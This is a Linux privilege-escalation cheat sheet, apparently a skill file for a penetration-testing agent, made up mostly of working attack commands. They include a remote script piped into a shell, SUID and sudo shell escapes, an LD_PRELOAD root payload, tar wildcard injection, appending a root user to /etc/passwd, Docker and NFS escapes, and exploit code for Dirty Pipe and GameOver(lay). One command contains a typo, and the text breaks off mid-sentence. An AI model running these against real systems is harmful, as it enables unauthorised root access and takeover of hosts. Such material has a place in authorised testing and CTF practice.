Linux Privilege Escalation

When to Activate

• Gained initial shell on Linux target, need root
• Post-exploitation privilege escalation
• Container escape scenarios
• CTF challenges requiring privesc

Automated Enumeration

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Linux Exploit Suggester
./linux-exploit-suggester.sh

# pspy (process monitoring without root)
./pspy64

Manual Enumeration

System Info

uname -a                    # Kernel version
cat /etc/os-release         # OS version
id                          # Current user/groups
env                         # Environment variables
cat /etc/passwd             # Users
cat /etc/crontab            # Cron jobs
ls -la /etc/cron*           # All cron directories
mount                       # Mounted filesystems
df -h                       # Disk usage
ip addr / ifconfig          # Network interfaces
netstat -tulpn / ss -tulpn  # Listening services
ps aux                      # Running processes

SUID/SGID Binaries

find / -perm -4000 -type f 2>/dev/null  # SUID
find / -perm -2000 -type f 2>/dev/null  # SGID

# Check GTFOBins for each:
# https://gtfobins.github.io/#+suid
# Common exploitable SUID:
# - /usr/bin/find → find . -exec /bin/sh -p \;
# - /usr/bin/vim → vim -c ':!/bin/sh'
# - /usr/bin/python3 → python3 -c 'import os;os.execl("/bin/sh","sh","-p")'
# - /usr/bin/env → env /bin/sh -p
# - /usr/bin/nmap (old) → nmap --interactive → !sh

Capabilities

getcap -r / 2>/dev/null

# Exploitable capabilities:
# cap_setuid+ep → set UID to 0
#   python3: python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
# cap_dac_read_search → read any file
# cap_net_raw → packet sniffing
# cap_sys_admin → mount filesystems, abuse cgroups
# cap_sys_ptrace → inject into processes

Sudo

sudo -l  # List allowed commands

# Exploitable sudo entries:
# (ALL) NOPASSWD: /usr/bin/vim → :!/bin/sh
# (ALL) NOPASSWD: /usr/bin/less → !/bin/sh
# (ALL) NOPASSWD: /usr/bin/awk → awk 'BEGIN {system("/bin/sh")}'
# (ALL) NOPASSWD: /usr/bin/find → find . -exec /bin/sh \;
# (ALL) NOPASSWD: /usr/bin/python3 → python3 -c 'import pty;pty.spawn("/bin/bash")'
# (ALL) NOPASSWD: /usr/bin/env → env /bin/sh
# (ALL) NOPASSWD: /usr/bin/perl → perl -e 'exec "/bin/sh"'

# LD_PRELOAD (if env_keep+=LD_PRELOAD in sudoers)
# Compile: gcc -fPIC -shared -o /tmp/pe.so pe.c -nostartfiles
# pe.c: void _init() { setuid(0); system("/bin/bash -p"); }
# sudo LD_PRELOAD=/tmp/pe.so /allowed/command

Cron Jobs

cat /etc/crontab
ls -la /etc/cron.d/
crontab -l
# Check for writable scripts called by root cron
# Check for wildcard injection (tar, rsync with *)

# Wildcard injection (tar):
# If cron runs: tar czf /backup/backup.tar.gz *
# Create: --checkpoint=1 --checkpoint-action=exec=sh shell.sh
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash" > shell.sh

Writable Files/Paths

# Writable /etc/passwd
echo 'hacker:$(openssl passwd -1 pass123):0:0::/root:/bin/bash' >> /etc/passwd

# Writable service files
find /etc/systemd/system -writable -type f 2>/dev/null
# Modify ExecStart to reverse shell

# Writable PATH directories
echo $PATH | tr ':' '\n' | xargs -I{} find {} -writable -type d 2>/dev/null
# Place malicious binary with name of command run by root

# Writable library paths
find / -writable -name "*.so" 2>/dev/null
ldconfig -v 2>/dev/null | grep -v "^$"

Kernel Exploits

uname -r
# Search: searchsploit linux kernel $(uname -r | cut -d'-' -f1)

# Notable kernel exploits:
# DirtyPipe (CVE-2022-0847) — Linux 5.8-5.16.11
# DirtyCow (CVE-2016-5195) — Linux 2.6.22-4.8.3
# PwnKit (CVE-2021-4034) — pkexec, almost all Linux
# Sequoia (CVE-2021-33909) — filesystem layer, most kernels
# GameOver(lay) (CVE-2023-2640) — Ubuntu OverlayFS

Docker/Container Escape

# Check if in container
cat /proc/1/cgroup | grep -i docker
ls /.dockerenv

# Docker socket mounted
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host

# Privileged container
fdisk -l  # can see host disks
mount /dev/sda1 /mnt && chroot /mnt

# Cap SYS_ADMIN + apparmor=unconfined
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
# Then abuse release_agent for host command execution

# CVE-2019-5736 (runc overwrite)
# Overwrite /usr/bin/runc on host via /proc/self/exe

NFS

showmount -e $TARGET
# If no_root_squash is set:
# Mount share, create SUID binary as root, execute on target
mount -t nfs $TARGET:/share /mnt
cp /bin/bash /mnt/rootbash && chmod +s /mnt/rootbash
# On target: /share/rootbash -p

Advanced: Kernel Exploitation

Dirty Pipe (CVE-2022-0847)

// Overwrite any file regardless of permissions — Linux 5.8 to 5.16.11
// Exploit: splice() into pipe → write over page cache → modifies file

// Usage: overwrite /etc/passwd to add root user
// Or: overwrite SUID binary with custom code
// Or: overwrite /usr/bin/su with shell that drops to root

#include <unistd.h>
#include <fcntl.h>
// 1. Open target file (read-only is fine)
int fd = open("/etc/passwd", O_RDONLY);
// 2. Create pipe, fill and drain (set PIPE_BUF_FLAG_CAN_MERGE)
int pipefd[2]; pipe(pipefd);
write(pipefd[1], buf, PAGE_SIZE); // fill pipe
read(pipefd[0], buf, PAGE_SIZE);  // drain pipe
// 3. Splice target file into pipe (references page cache)
splice(fd, &offset, pipefd[1], NULL, 1, 0);
// 4. Write to pipe — overwrites page cache (and the file)
write(pipefd[1], "root::0:0::/root:/bin/bash\n", 27);

GameOver(lay) (CVE-2023-2640 + CVE-2023-32629)

# Ubuntu-specific OverlayFS privilege escalation
# Exploit: set trusted.overlay.metacopy xattr on file in overlay
# Kernel treats it as privileged overlay metadata

unshare -rm sh -c "
  mkdir l u w m &&
  cp /u*/b*/p]asswd l/
  setcap cap_setuid+eip l/passwd &&
  mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &&
  touch m/--hierarchical &&
  u/passwd
"
# Result: arbitrary capabilities on arbitrary files → root

Dirty Cred (CVE-2022-2588)

// Swap kernel credentials by exploiting object reuse in SLAB allocator
// When cred structure is freed and reallocated, attacker controls new cred
// Works across kernel versions — generic technique

// Strategy:
// 1. Trigger vulnerability that frees a credential object
// 2. Spray the slab cache with controlled objects of same size
// 3. Object reuse → attacker's data interpreted as credentials
// 4. Kernel uses corrupted cred → privilege escalation

eBPF Exploitation

# eBPF programs run in kernel — vulnerabilities = kernel code execution
# Common eBPF vulnerabilities:
# - Verifier bypass → arbitrary kernel read/write
# - Type confusion in BPF maps
# - OOB access via crafted BPF programs

# CVE-2021-31440: eBPF verifier bounds tracking issue
# CVE-2021-3490: eBPF ALU32 bounds tracking
# CVE-2023-2163: eBPF verifier range tracking

# Check if unprivileged BPF is allowed:
cat /proc/sys/kernel/unprivileged_bpf_disabled
# 0 = unprivileged users can load BPF programs (exploitable)
# 1 = restricted to CAP_BPF/CAP_SYS_ADMIN

Netfilter / nftables Exploitation

# Linux firewall subsystem runs in kernel — bugs = root
# CVE-2022-25636 (nft_fwd_dup_netdev_offload OOB write)
# CVE-2023-0179 (nftables stack buffer overflow)
# CVE-2023-32233 (nf_tables use-after-free)
# CVE-2024-1086 (nf_tables double-free)

# CVE-2024-1086 exploit:
# User namespace + nftables → double-free in page allocator
# Spray + overwrite page table entries → arbitrary kernel R/W
# Modify current task's credentials → root
# Works on kernels 5.14 to 6.6 (wide coverage)

Advanced: Namespace & Container Breakout

User Namespace Escalation

# User namespaces allow unprivileged users to get "root" inside namespace
# Combine with kernel bugs for real root:

# Create user namespace wit